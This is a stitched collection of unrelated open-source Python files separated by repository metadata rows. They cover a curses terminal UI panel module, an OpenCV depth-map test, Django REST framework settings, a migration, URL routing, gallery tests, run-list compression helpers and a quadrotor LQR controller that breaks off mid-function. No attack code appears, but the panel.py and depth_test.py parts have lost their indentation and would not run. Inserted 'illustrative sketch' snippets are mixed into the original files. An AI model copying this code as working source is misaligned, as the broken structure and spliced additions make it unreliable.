subwinMaxY, subwinMaxX = self.win.getmaxyx()
recreate |= subwinMaxY < newHeight # check for vertical growth
recreate |= self.top > self.win.getparyx()[0] # check for displacement
recreate |= subwinMaxX > newWidth or subwinMaxY > newHeight # shrinking
# I'm not sure if recreating subwindows is some sort of memory leak but the
# Python curses bindings seem to lack all of the following:
# - subwindow deletion (to tell curses to free the memory)
# - subwindow moving/resizing (to restore the displaced windows)
# so this is the only option (besides removing subwindows entirely which
# would mean far more complicated code and no more selective refreshing)
if recreate:
self.win = self.parent.subwin(newHeight, newWidth, self.top, self.left)
# note: doing this log before setting win produces an infinite loop
#msg = "recreating panel '%s' with the dimensions of %i/%i" % (self.getName(), newHeight, newWidth)
#log.debug(CONFIG["log.panelRecreated"], msg)
return recreate
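# Illustrative sketch (not part of the original): the in-line formatting
# grammar accepted by Panel.addfstr. Nested tags OR their attributes together
# and unclosed tags raise a ValueError; "green" is assumed to be one of the
# colours registered from COLOR_LIST.
def _addfstr_example(panel):
    panel.addfstr(0, 0, "<b>bold</b> plain <u><green>under green</green></u>")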
class LabelPanel(Panel):
"""
Panel that just displays a single line of text.
"""
def __init__(self, stdscr):
Panel.__init__(self, stdscr, "msg", 0, height=1)
self.msgText = ""
self.msgAttr = curses.A_NORMAL
def setMessage(self, msg, attr=None):
"""
Sets the message being displayed by the panel.
Arguments:
msg - string to be displayed
attr - attribute for the label, normal text if undefined
"""
if attr == None: attr = curses.A_NORMAL
self.msgText = msg
self.msgAttr = attr
def draw(self, width, height):
self.addstr(0, 0, self.msgText, self.msgAttr)
class PopupPanel(Panel):
"""
    Popup panel that displays a query and collects a single line of user input.
"""
def __init__(self, stdscr, width, height):
Panel.__init__(self, stdscr, "popup", width, height)
self.queryText = None
self.queryAttr = curses.A_BOLD
self.defaultResponse = None
self.topUserResponse = 0
self.leftUserResponse = 0
self.userResponseMaxWidth = 0
def setQuery(self, query, attr=None):
"""
Sets the message being displayed by the panel.
Arguments:
msg - string to be displayed
attr - attribute for the label, normal text if undefined
"""
if attr == None: attr = curses.A_BOLD
self.queryText = query
self.queryAttr = attr
def setDefaultResponse(self, response):
self.defaultResponse = response
def getUserResponse(self):
userInput = None
if self.defaultResponse is not None:
CURSES_LOCK.acquire()
try:
userInput = self.getstr(self.topUserResponse, self.leftUserResponse, self.defaultResponse,
format=curses.A_STANDOUT, maxWidth=self.userResponseMaxWidth)
finally:
CURSES_LOCK.release()
return userInput
def draw(self, width, height):
drawBox(self, 0, 0, width - 2, height - 2)
yoffset = 2
if self.queryText is not None:
m = splitStr(self.queryText, width - 4)
for line in m:
self.addstr(yoffset, 2, line, self.queryAttr)
yoffset += 1
self.topUserResponse = yoffset + 2
self.leftUserResponse = 2
self.userResponseMaxWidth = width - 6
class ScrollPanel(Panel):
    def __init__(self, stdscr, top):
        Panel.__init__(self, stdscr, "scroll", top)
        self.contents = []
        self.data = []     # raw lines buffered via add()
        self.backlog = 0   # cap on lines kept by add(), 0 means unlimited
        self.scrollTop = 0
        self.scrollBottom = 0
        self.scrollHeight = 0
        self.scrollFollow = True
def add(self, output):
for line in output.split('\n'): self.data.append(line)
if self.backlog > 0:
while len(self.data) > self.backlog: self.data.pop(0)
if self.scrollFollow:
self.scrollBottom = len(self.data)
self.scrollTop = max(0, self.scrollBottom - self.scrollHeight)
def set(self, contents):
self.contents = contents
def get(self):
return self.contents
def draw(self, width, height):
output = []
for item in self.contents:
lines = splitStr(item, width - 2)
for line in lines: output.append(line)
self.scrollLines = len(output)
self.scrollHeight = height - 1
self.scrollBottom = min(self.scrollTop + self.scrollHeight, self.scrollLines)
# if we've navigated away from the bottom of the log, stop following new output
if self.scrollBottom != self.scrollLines: self.scrollFollow = False
# start following again if we navigate back to the bottom of the log
else: self.scrollFollow = True
        # don't draw unless we have data
if self.scrollLines > 0:
yoffset = 0
if self.isTitleVisible():
self.addstr(yoffset, 0, self.getName(), curses.A_STANDOUT)
self.addstr(yoffset, len(self.getName()) + 1, "s: save log", curses.A_NORMAL)
yoffset += 1
self.addScrollBar(self.scrollTop, self.scrollBottom, self.scrollLines, drawTop=yoffset, drawScrollBox=True)
for i in xrange(self.scrollTop, min(self.scrollBottom, len(output))):
line = output[i]
self.addstr(yoffset, 3, padStr(line, width - 3))
yoffset += 1
def handleKey(self, key):
# we only care if they pushed one of the scroll keys
if isScrollKey(key):
newScroll = getScrollPosition(key, self.scrollTop, self.scrollHeight, self.scrollLines)
if self.scrollTop != newScroll:
self.scrollTop = newScroll
self.redraw(True)
return True
else: return False
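# Illustrative sketch (not part of the original): the slider arithmetic used
# by Panel.addScrollBar for a 100 item list showing items 40-60 in a 20 row
# bar. The figures are made up; integer division matches the Python 2 code.
def _scrollbar_geometry_example():
    top, bottom, size, height = 40, 60, 100, 20
    sliderTop = height * top / size               # -> 8
    sliderSize = height * (bottom - top) / size   # -> 4
    return sliderTop, sliderSize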
class ControlPanel(Panel):
"""
Panel that displays selectable controls.
"""
def __init__(self, stdscr, top, left):
Panel.__init__(self, stdscr, "Controls", top, left)
# holds a list of Options to display in this panel
self.controls = None
# display attributes for each option name
self.controlNameAttributes = curses.A_BOLD | curses.COLOR_RED
# display attributes for each option description
self.controlDescriptionAttributes = curses.COLOR_RED
# a message displayed before the option list
self.message = None
# display attributes for the message
self.messageAttributes = self.controlNameAttributes
# the option that is selected
self.selectedIndex = None
def setMessage(self, message):
self.message = message
def setControls(self, controls):
"""
Sets the controls being displayed by the panel.
Arguments:
controls - list of controls
"""
self.controls = controls
if controls is not None and len(self.controls) > 0: self.selectedIndex = 0
def draw(self, width, height):
drawBox(self, 0, 0, width, height)
# breakup the message and draw it inside the box
textWidth = width - 4
msgLines = splitStr(self.message, textWidth)
for i in range(len(msgLines)): self.addstr(i + 1, 2, msgLines[i], self.messageAttributes)
# track position for each option on the screen
y, offset = len(msgLines) + 1, 0
for o in self.controls:
# selected controls stand out from the rest
extraAttributes = 0
if o is self.controls[self.selectedIndex]: extraAttributes = curses.A_STANDOUT
# draw the option name and description
offset += 1
label = o[0]#.getName()
self.addstr(y + offset, 2, label,
self.controlNameAttributes | extraAttributes)
# set whitespace as non-bold due to curses pixel alignment bug
self.addstr(y + offset, 2 + len(label), " " * (textWidth - len(label)),
self.controlDescriptionAttributes | extraAttributes)
y += 1
description = splitStr(o[1], textWidth)#.getDescription(), 54)
for line in description:
self.addstr(y + offset, 2, padStr(line, textWidth),
self.controlDescriptionAttributes | extraAttributes)
offset += 1
def handleKey(self, key):
# if the iopanel is currently active, pass key there
if self.selectedIndex is not None:
if isScrollKey(key):
pageHeight = self.getPreferredSize()[0] - 1
self.selectedIndex = getScrollPosition(key, self.selectedIndex,
pageHeight, len(self.controls), isCursor=True, doLoop=True)
elif isSelectionKey(key):
return self.controls[self.selectedIndex][0]
return None
class OptionPanel(Panel):
"""
Panel that displays user options.
Each option may have list of suboptions. We currently only draw one level
of suboptions (meaning the suboptions of suboptions will not be drawn).
"""
def __init__(self, stdscr, top, left, message=None, options=[], rightAlignValues=False):
Panel.__init__(self, stdscr, "options", top, left)
# holds a list of Options to display in this panel
self.options = self._combineOptions(options, True)
# flat list of all options and recursive suboptions
self.displayedOptions = self._combineOptions(options, False)
# a message displayed before the option list
self.message = message
self.rightAlignValues = rightAlignValues
# the option that is selected
self.selectedIndex = 0 if len(options) > 0 else None
self.lastIndent = 0
self.lastValueWidth = 20
def _combineOptions(self, options, includeDisabled=True):
combined = []
for option in options:
if option.isEnabled() or includeDisabled:
combined.append(option)
sub = self._combineOptions(option.getSuboptions(), includeDisabled)
for s in sub: combined.append(s)
return combined
def setMessage(self, message):
self.message = message
def getOptions(self):
return self.options
def addOption(self, option):
"""
Sets the options being displayed by the panel.
Arguments:
options - list of options
"""
self.options.append(option)
for o in self._combineOptions([option], False): self.displayedOptions.append(o)
if self.selectedIndex is None: self.selectedIndex = 0
def draw(self, width, height):
defaultStyle = curses.A_BOLD
drawBox(self, 0, 0, width, height)
# breakup the message and draw it inside the box
textWidth = width - 4
msgLines = splitStr(self.message, textWidth)
for i in range(len(msgLines)): self.addstr(i + 1, 2, msgLines[i], defaultStyle)
# track position for each option on the screen
y = len(msgLines) + 2
selectedDescription = None
indent = 0
for o in self.options: indent = max(indent, len(o.getLabel()))
indent += 5 # 2 for left box and space, 3 for suboptions, 1 for pad
for o in self.displayedOptions:
# TODO fix this horrible inefficiency
isSubOption = False
for opt in self.displayedOptions:
if o in opt.getSuboptions():
isSubOption = True
break
# selected controls stand out from the rest
extraAttributes = 0
if self.selectedIndex < len(self.displayedOptions) and o is self.displayedOptions[self.selectedIndex]:
extraAttributes = curses.A_STANDOUT | curses.A_BOLD
selectedDescription = o.getDescription(width-4)
# draw the option name and description
label = o.getLabel()
labelLen = len(label)
x = 2
if isSubOption:
self.addch(y, x, curses.ACS_LLCORNER)
self.addch(y, x+1, curses.ACS_HLINE)
x += 3
labelLen += 1
self.addstr(y, x, label, o.getDisplayAttr() | extraAttributes)
remainingSpace = textWidth - labelLen
value = o.getDisplayValue()
if self.rightAlignValues:
self.addstr(y, width-2-len(value), value, o.getDisplayAttr() | extraAttributes)
remainingSpace -= len(value)
# set whitespace as non-bold due to curses pixel alignment bug
self.addstr(y, 2 + labelLen, " " * (remainingSpace),
o.getDisplayAttr() | extraAttributes)
else:
self.addstr(y, indent, value, o.getDisplayAttr() | extraAttributes)
# set whitespace as non-bold due to curses pixel alignment bug
endOfLabel = 2 + labelLen if not isSubOption else 4 + labelLen
self.addstr(y, endOfLabel, " " * (indent - (endOfLabel)),
o.getDisplayAttr() | extraAttributes)
self.addstr(y, indent + len(value), " " * (width-indent-2-len(value)),
o.getDisplayAttr() | extraAttributes)
y += 1
y += 1
prevLabel = "Back"
prevDesc = "Return to re-select the setup mode."
nextLabel = "Confirm config and start setup"
nextDesc = "Confirm the above configuration and start the setup process."
# TODO refactor this !!
if self.selectedIndex == len(self.displayedOptions):
self.addstr(y, 4, prevLabel, defaultStyle | curses.A_STANDOUT)
self.addstr(y, width-4-len(nextLabel), nextLabel, defaultStyle)
selectedDescription = splitStr(prevDesc, width-4)
elif self.selectedIndex == len(self.displayedOptions)+1:
self.addstr(y, 4, prevLabel, defaultStyle)
self.addstr(y, width-4-len(nextLabel), nextLabel, defaultStyle | curses.A_STANDOUT)
selectedDescription = splitStr(nextDesc, width-4)
else:
self.addstr(y, 4, prevLabel, defaultStyle)
self.addstr(y, width-4-len(nextLabel), nextLabel, defaultStyle)
y += 1
self.hline(y, 1, width-2)
y += 1
for line in selectedDescription:
self.addstr(y, 2, padStr(line, textWidth))
y += 1
self.lastIndent = indent
self.lastValueWidth = width - indent - 2
def handleKey(self, key):
si = self.selectedIndex
do = self.displayedOptions
if si is None: return None
if key == curses.KEY_UP:
si = (si - 1) % (len(do)+2)
elif key == curses.KEY_DOWN:
si = (si + 1) % (len(do)+2)
elif isSelectionKey(key):
if si == len(do): return OptionResult.BACK # selected back
elif si == len(do)+1: return OptionResult.NEXT # selected next
elif isinstance(do[si], ToggleOption):
do[si].toggle()
i = si + 1
for o in do[si].getSuboptions():
if not o.isEnabled():
                        if o in do: do.remove(o)
else:
do.insert(i, o)
i += 1
else:
newValue = self.getstr(si + 3, self.lastIndent, do[si].getValue(), curses.A_STANDOUT | getColor(OPTION_COLOR), self.lastValueWidth)
if newValue:
try: do[si].setValue(newValue.strip())
except ValueError, exc:
pass
#cli.popups.showMsg(str(exc), 3)
#cli.controller.getController().redraw()
elif key == 27: si = len(do) # select the back button
self.selectedIndex = si
return None
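# Illustrative sketch (not part of the original file): the selection index in
# handleKey() cycles modulo len(displayedOptions) + 2, where the two extra
# slots stand for the synthetic "Back" and "Next" buttons drawn below the
# option list. A standalone model of that arithmetic with three hypothetical
# options:
def _cycleSelection(si, optionCount, movingUp):
    step = -1 if movingUp else 1
    return (si + step) % (optionCount + 2)
# _cycleSelection(2, 3, False) -> 3 (the "Back" slot)
# _cycleSelection(4, 3, False) -> 0 (wraps past "Next" to the first option)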
|
shadow/shadow-ctl
|
src/panel.py
|
Python
|
gpl-3.0
| 41,934 | 0.005032 |
#!/usr/bin/python3
import numpy as np
import cv2
from collections import deque
from obstacle_detector.distance_calculator import spline_dist
from obstacle_detector.perspective import inv_persp_new
from obstacle_detector.perspective import regress_perspecive
from obstacle_detector.depth_mapper import calculate_depth_map
from obstacle_detector.tm.image_shift_calculator import find_shift_value
def video_test(input_video_path=None, output_video_path=None):
cx = 595
cy = 303
roi_width = 25
roi_length = 90
cap = cv2.VideoCapture(
input_video_path \
if input_video_path is not None \
else input('enter video path: '))
old_images = deque()
original_frames = deque()
ret, frame = cap.read()
for i in range(15):
original_frames.append(frame)
img, pts1 = inv_persp_new(
frame, (cx, cy), (roi_width, roi_length), spline_dist, 200)
old_images.append(img)
ret, frame = cap.read()
height, width, _ = frame.shape
out_height, out_width, _ = img.shape
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(
output_video_path \
if output_video_path is not None \
else 'output.avi',
fourcc, 15.0, (out_width * 4, out_height))
    # NOTE: these sample images are overwritten inside the loop below and never used
    left = cv2.imread('aloeL.jpg')
    right = cv2.imread('aloeR.jpg')
while(ret):
original_frames.popleft()
ret, frame = cap.read()
original_frames.append(frame)
img, pts1 = inv_persp_new(
frame, (cx, cy), (roi_width, roi_length), spline_dist, 200)
old_images.popleft()
old_images.append(img)
left = original_frames[-5][:, width // 2:]
right = original_frames[-1][:, width // 2:]
left = cv2.pyrDown(left)
left = cv2.blur(left, (3, 3))
right = cv2.pyrDown(right)
right = cv2.blur(right, (3, 3))
depth = calculate_depth_map(left, right)
cv2.imshow('left', left)
cv2.imshow('right', right)
cv2.imshow('depth', depth)
depth = cv2.cvtColor(depth, cv2.COLOR_GRAY2BGR)
res = cv2.addWeighted(left, 0.5, depth, 0.5, 0)
cv2.imshow('res', res)
# left = old_images[-1][300:,:]
# right = old_images[-9][300:,:]
#
# shift_value = find_shift_value(left, right, (30, 100, 60, 300))
# right = np.roll(right, shift_value[1], axis=0)#shift_value[0])
# right = np.roll(right, shift_value[0], axis=1)#shift_value[0])
# left = left[100:-100,:]
# right = right[100:-100,:]
#
# print(shift_value)
#
# left = np.rot90(left, 3)
# right = np.rot90(right, 3)
#
# cv2.imshow('left', left)
# cv2.imshow('right', right)
#
# shifted_map = cv2.equalizeHist(
# calculate_depth_map(
# left, right))
# cv2.imshow(
# 'shifted map', shifted_map)
# diff = cv2.absdiff(left, right)
# cv2.imshow('diff', diff)
# dm = calculate_depth_map(left, right)
# cv2.imshow('dm', dm)
# dm = cv2.equalizeHist(dm)
# cv2.imshow('eq dm', dm)
# dm = cv2.cvtColor(dm, cv2.COLOR_GRAY2BGR)
k = cv2.waitKey(1) & 0xff
if k == 27:
break
elif k == ord('s'):
cv2.imwrite('screen.png', img)
cap.release()
out.release()
cv2.destroyAllWindows()
video_test('../../video/6.mp4', '../results/depth_map_out.avi')
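# Illustrative sketch (assumption, not part of the original file): a plain
# OpenCV block-matching disparity map of the kind calculate_depth_map likely
# wraps internally. StereoBM_create/compute are standard OpenCV 3.x APIs; the
# helper name is hypothetical.
def naive_depth_map(left_bgr, right_bgr):
    grayL = cv2.cvtColor(left_bgr, cv2.COLOR_BGR2GRAY)
    grayR = cv2.cvtColor(right_bgr, cv2.COLOR_BGR2GRAY)
    stereo = cv2.StereoBM_create(numDisparities=16, blockSize=15)
    disparity = stereo.compute(grayL, grayR)  # fixed-point int16 disparities
    # normalize to an 8-bit image for display, like the maps shown above
    return cv2.normalize(
        disparity, None, 0, 255, cv2.NORM_MINMAX).astype(np.uint8)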
|
Sid1057/obstacle_detector
|
depth_test.py
|
Python
|
mit
| 3,465 | 0.002886 |
"""
Settings for REST framework are all namespaced in the REST_FRAMEWORK setting.
For example your project's `settings.py` file might look like this:
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.YAMLRenderer',
        ),
'DEFAULT_PARSER_CLASSES': (
'rest_framework.parsers.JSONParser',
'rest_framework.parsers.YAMLParser',
)
}
This module provides the `api_settings` object, which is used to access
REST framework settings, checking for user settings first, then falling
back to the defaults.
"""
from __future__ import unicode_literals
from django.conf import settings
from django.utils import importlib
from rest_framework import ISO_8601
from rest_framework.compat import six
USER_SETTINGS = getattr(settings, 'REST_FRAMEWORK', None)
DEFAULTS = {
# Base API policies
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_PARSER_CLASSES': (
'rest_framework.parsers.JSONParser',
'rest_framework.parsers.FormParser',
'rest_framework.parsers.MultiPartParser'
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.BasicAuthentication'
),
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.AllowAny',
),
'DEFAULT_THROTTLE_CLASSES': (
),
'DEFAULT_CONTENT_NEGOTIATION_CLASS':
'rest_framework.negotiation.DefaultContentNegotiation',
    # Generic view behavior
'DEFAULT_MODEL_SERIALIZER_CLASS':
'rest_framework.serializers.ModelSerializer',
'DEFAULT_PAGINATION_SERIALIZER_CLASS':
'rest_framework.pagination.PaginationSerializer',
'DEFAULT_FILTER_BACKENDS': (),
# Throttling
'DEFAULT_THROTTLE_RATES': {
'user': None,
'anon': None,
},
# Pagination
'PAGINATE_BY': None,
'PAGINATE_BY_PARAM': None,
'MAX_PAGINATE_BY': None,
# Authentication
'UNAUTHENTICATED_USER': 'django.contrib.auth.models.AnonymousUser',
'UNAUTHENTICATED_TOKEN': None,
# View configuration
'VIEW_NAME_FUNCTION': 'rest_framework.views.get_view_name',
'VIEW_DESCRIPTION_FUNCTION': 'rest_framework.views.get_view_description',
# Exception handling
'EXCEPTION_HANDLER': 'rest_framework.views.exception_handler',
# Testing
'TEST_REQUEST_RENDERER_CLASSES': (
'rest_framework.renderers.MultiPartRenderer',
'rest_framework.renderers.JSONRenderer'
),
'TEST_REQUEST_DEFAULT_FORMAT': 'multipart',
# Browser enhancements
'FORM_METHOD_OVERRIDE': '_method',
'FORM_CONTENT_OVERRIDE': '_content',
'FORM_CONTENTTYPE_OVERRIDE': '_content_type',
'URL_ACCEPT_OVERRIDE': 'accept',
'URL_FORMAT_OVERRIDE': 'format',
'FORMAT_SUFFIX_KWARG': 'format',
# Input and output formats
'DATE_INPUT_FORMATS': (
ISO_8601,
),
'DATE_FORMAT': None,
'DATETIME_INPUT_FORMATS': (
ISO_8601,
),
'DATETIME_FORMAT': None,
'TIME_INPUT_FORMATS': (
ISO_8601,
),
'TIME_FORMAT': None,
# Pending deprecation
'FILTER_BACKEND': None,
}
# List of settings that may be in string import notation.
IMPORT_STRINGS = (
'DEFAULT_RENDERER_CLASSES',
'DEFAULT_PARSER_CLASSES',
'DEFAULT_AUTHENTICATION_CLASSES',
'DEFAULT_PERMISSION_CLASSES',
'DEFAULT_THROTTLE_CLASSES',
'DEFAULT_CONTENT_NEGOTIATION_CLASS',
'DEFAULT_MODEL_SERIALIZER_CLASS',
'DEFAULT_PAGINATION_SERIALIZER_CLASS',
'DEFAULT_FILTER_BACKENDS',
'EXCEPTION_HANDLER',
'FILTER_BACKEND',
'TEST_REQUEST_RENDERER_CLASSES',
'UNAUTHENTICATED_USER',
'UNAUTHENTICATED_TOKEN',
'VIEW_NAME_FUNCTION',
'VIEW_DESCRIPTION_FUNCTION'
)
def perform_import(val, setting_name):
"""
If the given setting is a string import notation,
then perform the necessary import or imports.
"""
if isinstance(val, six.string_types):
return import_from_string(val, setting_name)
elif isinstance(val, (list, tuple)):
return [import_from_string(item, setting_name) for item in val]
return val
def import_from_string(val, setting_name):
"""
Attempt to import a class from a string representation.
"""
try:
# Nod to tastypie's use of importlib.
parts = val.split('.')
module_path, class_name = '.'.join(parts[:-1]), parts[-1]
module = importlib.import_module(module_path)
return getattr(module, class_name)
except ImportError as e:
msg = "Could not import '%s' for API setting '%s'. %s: %s." % (val, setting_name, e.__class__.__name__, e)
raise ImportError(msg)
class APISettings(object):
"""
A settings object, that allows API settings to be accessed as properties.
For example:
from rest_framework.settings import api_settings
print api_settings.DEFAULT_RENDERER_CLASSES
Any setting with string import paths will be automatically resolved
and return the class, rather than the string literal.
"""
def __init__(self, user_settings=None, defaults=None, import_strings=None):
self.user_settings = user_settings or {}
self.defaults = defaults or {}
self.import_strings = import_strings or ()
def __getattr__(self, attr):
if attr not in self.defaults.keys():
raise AttributeError("Invalid API setting: '%s'" % attr)
try:
# Check if present in user settings
val = self.user_settings[attr]
except KeyError:
# Fall back to defaults
val = self.defaults[attr]
# Coerce import strings into classes
if val and attr in self.import_strings:
val = perform_import(val, attr)
self.validate_setting(attr, val)
# Cache the result
setattr(self, attr, val)
return val
def validate_setting(self, attr, val):
if attr == 'FILTER_BACKEND' and val is not None:
# Make sure we can initialize the class
val()
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRINGS)
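# Illustrative sketch (not part of the original file): APISettings resolves
# dotted import strings lazily on first attribute access and caches the
# result via setattr. A self-contained instance with a hypothetical override:
_example_settings = APISettings(
    user_settings={'PAGINATE_BY': 20},
    defaults=DEFAULTS,
    import_strings=IMPORT_STRINGS)
# _example_settings.PAGINATE_BY -> 20 (the user value wins over the default)
# _example_settings.DEFAULT_PARSER_CLASSES would import and return the three
# default parser classes, since that key is listed in IMPORT_STRINGS.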
|
DeltaEpsilon-HackFMI2/FMICalendar-REST
|
venv/lib/python2.7/site-packages/rest_framework/settings.py
|
Python
|
mit
| 6,264 | 0.000319 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-14 17:12
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('volunteers', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='volunteer',
old_name='picture',
new_name='avatar',
),
]
|
NewsNerdsAtCoJMC/ProjectTicoTeam6
|
service/volunteers/migrations/0002_auto_20170314_1712.py
|
Python
|
mit
| 424 | 0 |
"""equinox_spring16_api URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from rest_framework import routers
from equinox_api.views import ApplicationViewSet, OperationViewSet, InstancesViewSet, UserViewSet, ItemViewSet
from equinox_spring16_api import settings
router = routers.DefaultRouter()
router.register(r'applications', ApplicationViewSet)
router.register(r'operations', OperationViewSet)
router.register(r'instances', InstancesViewSet)
router.register(r'items', ItemViewSet)
router.register(r'users', UserViewSet)
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^', include(router.urls)),
url(r'^docs/', include('rest_framework_swagger.urls')),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
ivanprjcts/equinox-spring16-API
|
equinox_spring16_api/equinox_spring16_api/urls.py
|
Python
|
lgpl-3.0
| 1,431 | 0.000699 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from privagal.core.utils import PrivagalTestCase
from ...gallery.factories import GalleryFactory, ImageFactory
class GalleryFactoryTestCase(PrivagalTestCase):
def test_images_given(self):
image = ImageFactory()
gallery = GalleryFactory(images__images=[image])
self.timeline.add_child(instance=gallery)
self.assertEqual(gallery.images.first().image, image)
def test_images_default(self):
gallery = GalleryFactory()
self.assertEqual(gallery.images.count(), 3)
|
ychab/privagal
|
privagal/gallery/tests/test_factories.py
|
Python
|
bsd-3-clause
| 584 | 0 |
from sqlalchemy import and_
from DBtransfer import *
from zlib import *
# returns the run list compressed
def generateFromDB(DBSession, InternData, tmp_name) :
run_list=[]
user_data = DBSession.query(InternData).filter(InternData.timestamp == tmp_name)
for data in user_data :
if not data.run in run_list :
run_list.append(data.run)
return compressList(run_list)
def getknown_runsAndrun_list(DBSession, Mass_specData, InternData, tmp_name) : #CR: rename to splitKnownAndTodo
#~ knownRuns = [] # devide runs from upload into known runs (in DB) ...
#~ runList = [] #...and the usual run_list, to get data from these runs
#CR:
runs_in_upload = decompressList(generateFromDB(DBSession, InternData, tmp_name))
#~ known_runs = [x for x in DBSession.query(Mass_specData.filename).all() if x in runs_in_upload]
known_runs = [x.filename for x in DBSession.query(Mass_specData).filter(Mass_specData.filename.in_(runs_in_upload))]
run_list = [x for x in runs_in_upload if x not in known_runs]
#~ allRuns = getAllRuns_Filename(DBSession, Mass_specData)# in DB saved runs
#~ decomruns_in_upload = decompressList(runs_in_upload)
#~ for run in decomruns_in_upload :
#~ if run in allRuns :
#~ knownRuns.append(run)
#~ else :
#~ runList.append(run)
return (known_runs, run_list)
#input compressed
#output not compressed
def usedRuns(run_list, params) :
list_of_used_runs = []
runs = decompressList(run_list)
for i in range(0, len(runs)) :
if runs[i] in params :
list_of_used_runs.append(runs[i])
return list_of_used_runs
# input not compressed
# output InternData objects
def rowsToFill(DBSession, InternData, tmp_name, used_runs) :
users_rows = getUserRows(DBSession, InternData, tmp_name)
rows = []
for row in users_rows :
if row.run in used_runs :
rows.append(row)
return rows
# input: run_list compressed, used_runs not compressed
def throughOutUsedRuns(run_list, used_runs) :
rl = decompressList(run_list)
for run in used_runs :
rl.pop(rl.index(run))
if len(rl) > 0 :
return compressList(rl)
else :
return []
#
def compressList(list) :
return compress('$$'.join(list))
#input compressed
def decompressList(run_list) :
return decompress(run_list).split('$$')
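# Illustrative sketch (not part of the original file): run lists travel
# through the DB as zlib-compressed '$$'-joined strings, so compressList and
# decompressList are inverses. Hypothetical run names; Python 2 str semantics
# assumed, matching the rest of this module.
def _roundTripSketch() :
    example_runs = ['run_A.raw', 'run_B.raw']
    return decompressList(compressList(example_runs)) == example_runs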
|
mwalzer/Ligandomat
|
ligandomat/run_list_handling.py
|
Python
|
mit
| 2,262 | 0.07206 |
#!/usr/bin/env python
'''======================================================
Created by: D. Spencer Maughan
Last updated: May 2015
File name: IRIS_DF_Controller.py
Organization: RISC Lab, Utah State University
Notes:
======================================================'''
import roslib; roslib.load_manifest('risc_msgs')
import rospy
from math import *
import numpy as np
import time
#=======================#
# Messages Needed #
#=======================#
from risc_msgs.msg import *
from std_msgs.msg import Bool
from roscopter.msg import Status
#=====================#
# Gain Matrices #
#=====================#
K = np.matrix([[ 1.8, 0, 0, 1.4, 0, 0, 0],\
[ 0, 1.8, 0, 0, 1.4, 0, 0],\
[ 0, 0, 3, 0, 0, 5, 0],\
[ 0, 0, 0, 0, 0, 0,.5]])
#========================#
# Globals #
#========================#
nominal_thrust = 0 # thrust necessary to maintain hover given battery level
phi_scale = 3.053261127645355
phi_trim = 0.0#0.058941904209906
theta_scale = 3.815398742249453
theta_trim = 0.0#-0.091216767651723
ctrl_status = False
states = Cortex()
states.Obj = [States()]*1
traj = Trajectories()
traj.Obj = [Trajectory()]*1
euler_max = 45*np.pi/180
max_yaw_rate = .3490659 #in radians/sec
rate = 45 # Hz
image = 0
start_time = 0
#==================#
# Publishers #
#==================#
pub_ctrl = rospy.Publisher('/controls', Controls, queue_size = 1)
#========================#
# Get Cortex States #
#========================#
def GetStates(S):
global states
states = S
#=====================#
# Get Trajectory #
#=====================#
def GetTraj(S):
global traj
traj = S
#=========================#
# Get Battery Status #
#=========================#
def GetBatt(S):
global nominal_thrust
B = S.battery_remaining
# coefficients for fourth order fit
# determined 11 May 2015 by Spencer Maughan and Ishmaal Erekson
c0 = 0.491674747062374
c1 = -0.024809293286468
c2 = 0.000662710609466
c3 = -0.000008160593348
c4 = 0.000000033699651
nominal_thrust = c0+c1*B+c2*B**2+c3*B**3+c4*B**4
#============================#
# Get Controller Status #
#============================#
def GetStatus(S):
global ctrl_status
ctrl_status = S.data
#========================#
# Basic Controller #
#========================#
def Basic_Controller():
global states, euler_max, max_yaw_rate, pub_ctrl,K,traj
Ctrl = Controls()
Ctrl.Obj = [Control()]*1
Ctrl.header.stamp = states.header.stamp
    g = 9.80665 # standard gravitational acceleration in m/s^2
m = 1.282 # IRIS mass in kg
#===================================#
# Get State Trajectory Errors #
#===================================#
if states.Obj[0].visible:
X = np.asmatrix(np.zeros((7,1)))
X[0] = traj.Obj[0].x-states.Obj[0].x
X[1] = traj.Obj[0].y-states.Obj[0].y
X[2] = traj.Obj[0].z-states.Obj[0].z
X[3] = traj.Obj[0].xdot-states.Obj[0].u
X[4] = traj.Obj[0].ydot-states.Obj[0].v
X[5] = traj.Obj[0].zdot-states.Obj[0].w
X[6] = traj.Obj[0].psi-states.Obj[0].psi*np.pi/180
#============================================#
# Differential Flatness Control Input #
#============================================#
# LQR input
utilde = -K*X
# required input
u_r = np.asmatrix(np.zeros((4,1)))
u = utilde+u_r-np.matrix([[0],[0],[9.81],[0]])
#==================================#
# Rotate to Vehicle 1 Frame #
#==================================#
psi = states.Obj[0].psi*np.pi/180
rotZ = np.matrix([[cos(psi), sin(psi), 0],[-sin(psi), cos(psi), 0],[0, 0, 1]])
Cart = np.matrix([[1, 0, 0],[0, -1, 0],[0, 0, -1]])
u[:-1] = Cart*rotZ*u[:-1]
#===================================#
# Normalize given the Thrust #
#===================================#
T = sqrt(u[0:3].T*u[0:3])
u[:-1] = np.divide(u[:-1],-T)
#==================#
# Set Controls #
#==================#
# Controls for Ardrone
# -phi = right... +phi = left
# -theta = back... +theta = forward
# -psi = right... +psi = left
global phi_trim,theta_trim,phi_scale,theta_scale
phi_d = (asin(u[1,-1]))
